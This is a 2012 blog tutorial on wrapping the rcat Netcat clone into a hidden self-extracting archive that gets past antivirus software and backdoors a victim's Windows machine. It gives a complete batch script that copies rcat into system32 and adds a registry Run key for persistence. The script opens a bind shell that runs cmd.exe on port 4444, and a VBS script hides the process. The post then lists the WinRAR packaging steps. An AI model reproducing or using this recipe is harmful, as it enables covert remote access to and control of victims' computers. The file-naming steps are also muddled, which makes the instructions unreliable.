Pages

Saturday, November 10, 2012

How To Bypass Antivirus With Rcat


How To Bypass Antivirus With Rcat

As rcat is a good replica of Netcat and has an ability to bypass most of the antivirus, then why not wrap it up with another file (that must not a backdoor)?here is the report.
To do this we use a simple technique:


1)Create a batch file ,vbs file that will add your Rcat  into the system folder and can edit the registry of the windows. Wait you don’t need to create it because I did it for you.
@echo off
copy rcat.exe %systemroot%\system32\rcat.exe
if errorlevel 0 goto regedit
goto error
:regedit
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\name.vbs"
if errorlevel 0 goto ip
:error
echo something wrong with the program.
goto end
:ip
echo write down the IP address from the table
ipconfig
:end
echo end.
rcat.exe  -l -p 4444 -e cmd.exe -L
(We add a registry key because it auto runs the rcat at start up)
a)Open a notepad and than save it to name.bat
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "C:\WINDOWS\system32\name.bat" & Chr(34), 0
Set WshShell = Nothing
(In order to hide the  running rcat we use vb script )
b)Open another notepad then save it to name.vbs
b)Download rcat and then copy rcat.exe into the same directory where name.bat and name.vbs exist
c)Now we use winrar to combine these three files, select three and then right click on add to archive.
d)On the next window mark check on create SFX archive
e)Go to advance tab and click on SFX option
f)Fill out the options like at the figure below
g)Change the tab to modes and place mark of hide all
h)Almost done click OK than OK to create an exe  file
i)New file must be appear at the same directory
2)New file has an ability to bypass the most famous antivirus software and it has contained our back door.
Let’s suppose our victim has executed the file. Now we can easily get the response via our command promote or terminal.

  

    Conclusion

There are some crypter, wrapper and other tools available on the Internet, it is not highly recommended to download any file from an unknown source because some people usually use these techniques to make an innocent person look like a fool. So when you download and install such a file there is a chance that your computer will be affected by some sort of malware and backdoor(s).
So last but not least, never trust any unknown source. Otherwise you will be the next victim, whether you have antivirus or not. And now you have seen how easy is it is to bypass an antivirus
See How to find remote IP if you are in Internet :  Find Remote IP address
See the Video Tutorial on :  Bypass Antivirus with rcat

hope u will like this still any problem jst comment :D
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)